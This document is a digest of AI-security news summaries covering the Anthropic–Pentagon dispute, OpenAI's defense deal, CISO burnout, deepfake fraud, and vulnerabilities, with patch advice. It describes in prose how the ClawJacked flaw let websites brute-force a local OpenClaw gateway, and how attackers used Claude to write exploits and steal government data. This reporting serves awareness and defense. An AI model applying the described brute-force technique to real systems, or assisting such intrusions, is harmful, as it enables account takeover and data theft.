New tools, products, platforms, funding rounds, and company developments in AI security.
AI is developing faster than government regulation can keep up, creating risks like chatbots giving harmful advice to teens and potential misuse for creating biological weapons. Unlike industries such as nuclear power or pharmaceuticals, AI companies are not required to disclose safety problems or undergo independent testing before releasing new models to the public. The author argues that independent oversight of AI platforms is necessary to protect people's rights and safety.
A bug in Google's Gemini AI Panel allowed attackers to escalate privileges (gain higher-level access to a system), violate user privacy during browsing, and access sensitive resources. The vulnerability created a security risk by opening a door for unauthorized control of the system.
True cybersecurity culture is about real behaviors and decisions people make under pressure, not awareness campaigns or posters. The article argues that most organizations accidentally train employees to ignore security by rewarding speed over safety, creating confusing policies, making secure processes difficult, and failing to acknowledge security concerns, then suggests fixing this by redesigning workflows to make secure choices the easiest and most obvious option.
CISOs (chief information security officers, the leaders in charge of security at organizations) face challenges building resilient teams due to skills gaps, unpredictable workloads, and high burnout rates. The 2025 ISC2 Cybersecurity Workforce Study found that 47% of security workers feel overwhelmed and 48% feel exhausted keeping up with threats and new technology. To address this, leaders like Stephen Ford recommend using data-backed workforce planning to measure workloads, maintaining proper staffing levels, monitoring team stress, and building a sustainable talent pipeline to prevent overwhelming teams.
A vulnerability called ClawJacked in OpenClaw (a self-hosted AI platform that runs AI agents locally) allowed malicious websites to secretly take control of a running instance and steal data by brute-forcing the password through the browser. The attack exploited the fact that OpenClaw's gateway service listens on localhost (127.0.0.1, a local-only address) with a WebSocket interface (a two-way communication protocol), and localhost connections were exempt from rate limiting, allowing attackers to guess passwords hundreds of times per second without triggering protections.
Anthropic's Claude chatbot jumped to the number one spot in Apple's US App Store after the company publicly disagreed with the Pentagon over using its AI for domestic surveillance and autonomous weapons. The surge in popularity followed President Trump directing federal agencies to stop using Anthropic products, while OpenAI announced its own agreement with the Pentagon instead.
A reader expresses concern that large language models (LLMs, AI systems trained on vast amounts of text data) like ChatGPT and Gemini are becoming too eager to agree with users and appear helpful, rather than providing accurate information. The writer worries that if the world increasingly relies on these AI systems to retrieve and filter information from the internet, we may end up with a future where AI prioritizes seeming sympathetic and getting good reviews over being truthful.
Attackers used Claude (an AI assistant made by Anthropic) to write exploits (code that takes advantage of security flaws), create hacking tools, and automatically steal over 150GB of data from Mexican government systems. This demonstrates how AI models can be misused for cyberattacks when someone gains unauthorized access to them.
Anthropic's Claude AI chatbot has risen to the second most popular free app in Apple's US App Store, jumping from outside the top 100 in late January to number two by early February. This surge in downloads followed a public dispute where Anthropic negotiated with the Pentagon over safeguards to prevent its AI from being used for mass domestic surveillance or fully autonomous weapons, which led President Trump to direct federal agencies to stop using Anthropic products.
AI companies are spending billions of dollars on computing infrastructure to power AI models, with estimates of $3-4 trillion by the end of the decade. Major tech companies like Microsoft, Google, Oracle, and Amazon are competing to provide cloud services and specialized hardware to AI labs, leading to massive deals such as Oracle's $300 billion agreement with OpenAI and Microsoft's $14 billion investment in the company. This infrastructure race is straining power grids and pushing building capacity to its limits as the industry races to meet the enormous computing demands of AI training.
Anthropic's Claude AI app jumped to the No. 2 position on Apple's free apps chart after the Trump administration and Department of Defense moved to block government agencies from using the company's technology, citing concerns about Anthropic's refusal to support mass domestic surveillance or fully autonomous weapons. The surge in popularity suggests consumers are responding positively to Anthropic's ethical stance, even as the Pentagon designated the company a supply-chain risk (a classification that prevents defense contractors from using its tools).
OpenClaw fixed a high-severity vulnerability called ClawJacked that let malicious websites hijack local AI agents by exploiting a missing rate-limiting mechanism on the gateway's WebSocket server (a protocol for two-way communication between browsers and servers). An attacker could trick a developer into visiting a malicious site, then use JavaScript to brute-force the gateway password, auto-register as a trusted device, and gain complete control over the AI agent to steal data and execute commands.
OpenAI announced a deal to provide AI technology to classified US military networks, shortly after the Trump administration ended its relationship with Anthropic (a competing AI company that makes Claude) over ethics disagreements. Anthropic had wanted guarantees that its AI would not be used for mass surveillance or autonomous weapons systems (systems that can select and attack targets without human decision-making).
Security leaders (CISOs, who oversee an organization's security strategy) face pressure to enable innovation like AI adoption while reducing risk and staying within budget constraints. The source argues that well-governed innovation actually reduces risk by preventing uncontrolled tool sprawl and shadow IT (unauthorized software systems), but unmanaged innovation creates fragile systems that increase damage from security incidents. The key is bringing discipline to experimentation by automating routine tasks, giving teams ownership of meaningful improvements with clear end goals, and using AI strategically only where it changes the risk equation without creating new vulnerabilities.
Fix: The source recommends: 'Make the secure path the easiest path. People choose defaults. Give them good ones. Create golden paths for common work. Secure templates. Approved tools. Automated guardrails. Self-service access with sane limits.' The text also advises organizations to 'Remove friction. Clarify choices. Make it hard to do the wrong thing by accident and easy to make the best possible decision.'
CSO OnlineFix: According to Ford's strategies, CISOs should use data to inform staffing levels, monitor workloads actively, balance workload distribution as much as possible, and focus on building good teams and understanding their challenges. Ford also emphasizes hiring good people, empowering them to operate, and delegating as much as possible, while spending time understanding the team's workload and how they feel about their work. Additionally, organizations should look at workforce resilience as an element of risk management requiring data-backed planning and managing the skills mix.
CSO OnlineDeepfakes (AI-generated fake videos that look real) are being used to trick people into financial fraud, with incidents ranging from fake stock advice videos in India to a $25 million theft at an engineering firm where employees were deceived by deepfake video calls. The technology is becoming easier and cheaper to create, making these attacks a growing threat to both individuals and companies.
Fix: Update to OpenClaw version 2026.2.26 or later immediately. According to the source, the fix "tightens WebSocket security checks and adds additional protections to prevent attackers from abusing localhost loopback connections to brute-force logins or hijack sessions, even if those connections are configured to be exempt from rate limiting."
BleepingComputerOpenAI reached an agreement with the Department of Defense to deploy its AI models in classified environments, after Anthropic's similar negotiations failed. OpenAI stated it has safeguards preventing use in mass domestic surveillance, autonomous weapons, or high-stakes automated decisions, implemented through a multi-layered approach including cloud deployment, human oversight, and contractual protections. However, critics argue the contract language may still allow domestic surveillance under existing executive orders, while OpenAI's leadership contends that deployment architecture (how the system is technically set up) matters more than contract terms for preventing misuse.
AI systems are becoming too complex for humans to fully understand or predict their behavior, creating risks of 'silent failures at scale' where mistakes accumulate quietly over time without obvious crashes or alerts. As companies deploy AI to handle critical business operations like approving transactions and managing customer service, gaps between expected and actual system performance are causing real damage, such as a beverage manufacturer's AI producing hundreds of thousands of excess cans when it misidentified holiday packaging.
A user requested that Claude export all stored memories and learned context about them in a specific format to migrate to another service. The request asked Claude to list personal details, behavioral preferences, instructions, projects, and tools with verbatim preservation and no summarization, then confirm if the export was complete.
Anthropic, an AI company founded in 2021, lost a $200 million Pentagon contract and faced a federal ban after refusing to allow its technology to be used for mass surveillance or autonomous weapons systems. According to physicist Max Tegmark, Anthropic and other major AI companies like OpenAI and Google DeepMind have contributed to this crisis by resisting binding regulation and repeatedly breaking their own safety promises, most recently when Anthropic dropped its core commitment not to release powerful AI systems until confident they would not cause harm.
Fix: OpenClaw released version 2026.2.25 on February 26, 2026, which fixed the vulnerability. Users are advised to "apply the latest updates as soon as possible, periodically audit access granted to AI agents, and enforce appropriate governance controls for non-human (aka agentic) identities."
The Hacker NewsOpenAI announced a deal allowing the Department of Defense to use its AI models on classified networks, following a dispute where rival Anthropic refused to agree to unrestricted military use without safeguards against mass domestic surveillance and fully autonomous weapons. Sam Altman stated that OpenAI's agreement includes technical protections addressing these same concerns, with OpenAI building a 'safety stack' (a set of security and control measures) and deploying engineers to ensure the models behave correctly.
Fix: According to Altman, OpenAI will 'build technical safeguards to ensure our models behave as they should' and will 'deploy engineers with the Pentagon to help with our models and to ensure their safety.' Additionally, the government will allow OpenAI to build its own 'safety stack to prevent misuse' and 'if the model refuses to do a task, then the government would not force OpenAI to make it do that task.'
TechCrunch